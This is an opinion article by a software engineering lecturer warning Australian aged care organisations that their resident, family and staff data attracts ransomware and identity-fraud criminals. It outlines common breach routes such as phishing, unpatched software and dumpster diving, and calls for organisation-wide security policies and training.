Sooner or later the data held by an Australian aged care organisation will be systematically exploited by criminals, and it could be yours, writes Robert Merkel.
Aged care might seem an unlikely target, but in fact, for a different breed of hacker, aged care facilities are some of the most inviting targets possible. Cybercriminals attack IT systems for profit, and the information held on aged care IT systems is highly lucrative.
One way criminal hackers can make money out of an organisation’s IT systems is simply to hold the information stored on them to ransom. Recently, a hospital in California paid the equivalent of $23,000 in Bitcoin (an electronic currency that can be used to make anonymous internet payments) to the controllers of “ransomware” software that had infected their systems.
The ransomware software used encryption to turn the hospital’s patient records into gibberish, and the only way to regain access was with the electronic key held by the ransomware controllers. After 10 days without access, the hospital ultimately paid the ransom.
Gaining access to resident, family, and staff records, without altering them, can be more lucrative still. Aged care facilities have extensive personal information about their residents, family members, and staff. Such information – in the hands of criminals – can be used to commit identity fraud. As the Australian Federal Police explain, identity fraudsters can use personal information about people to:
- steal directly from them
- impersonate them to banks to obtain credit
- claim government benefits to which they are not entitled
On well-organised, global black markets, illegally-obtained personal details can be sold to those who exploit it for identity fraud. Because of the extent and high accuracy of the information held by aged care providers, it is particularly valuable on the black market.
Identity fraud can be devastating to victims; not only can they face large financial losses, their ability to conduct the basic financial transactions of daily life – open a bank account, get a credit card, or buy a mobile phone – can be severely disrupted for years to come.
Would you be happy to put your clients, their families, and your staff at such a risk? Imagine what it would do to your organisation’s reputation if it emerged that you were responsible for the data loss that enabled criminals to victimise your stakeholders? Do you want the Office of the Australian Information Commissioner, the responsible government body, investigating your data protection measures in the wake of a breach?
Many ways to steal data
Hackers use a wide variety of techniques to gain unauthorised access to systems and data – while all involve technical considerations, the human factor is also key.
An IBM report on data breaches in the healthcare sector revealed the most common techniques by which hackers gain unauthorised access to information. The most virulent threat of all are technical attacks using “0-day exploits” – in short, taking advantage of technical flaws in software, known to the hackers but for which no defence exists. However, data breaches are not typically caused by due to 0-days. The vast majority of “technical” data breaches come from exploiting well-known weaknesses in old or poorly configured software, and these can be avoided by keeping software up to date and configured correctly.
However, the most common causes of data breaches were due to exploiting human weakness, rather than technical weakness. “Phishing” scams attempt to trick users into revealing passwords, which hackers can then use to log into systems. Modern “spearphishing” scams are often targeted against specific organisations, or individuals within them. One common tactic is to send emails to staff that purport to come from a colleague – either by “spoofing” their email or by gaining access to their account. The email will come with an attachment that requests the user to enter their account details to view it. If somebody falls for the scam and enters their login information, it is immediately sent to the hackers who take control of the staff member’s account.
Do not ever open an attachment that you suspect is part of a phishing scam; special precautions were taken even to take this picture above. Even this relatively unsophisticated phishing scam compromised an internal university account from which it was sent.
Simplest of all, but still often very effective, is the ignoble art of “dumpster-diving” – that is, sifting through rubbish to find thrown-out computers with still-functioning hard disks full of private information. Fully 25 per cent of the data breaches reported in the IBM survey were due to dumpster diving and other physical losses of confidential data.
Information security is everyone’s responsibility
Given the variety of ways in which hackers can access confidential data, the job of keeping them out cannot be left entirely to IT staff and suppliers. Keeping data protected requires an organisation-wide strategy, including organisation-wide policies, training, and auditing.
None of this is free, and there is no immediate payoff for doing so. But, sooner or later, the data held by an Australian aged care organisation will be systematically exploited by criminals. Wouldn’t you prefer it not to be yours?
Robert Merkel is a lecturer in software engineering at Monash University.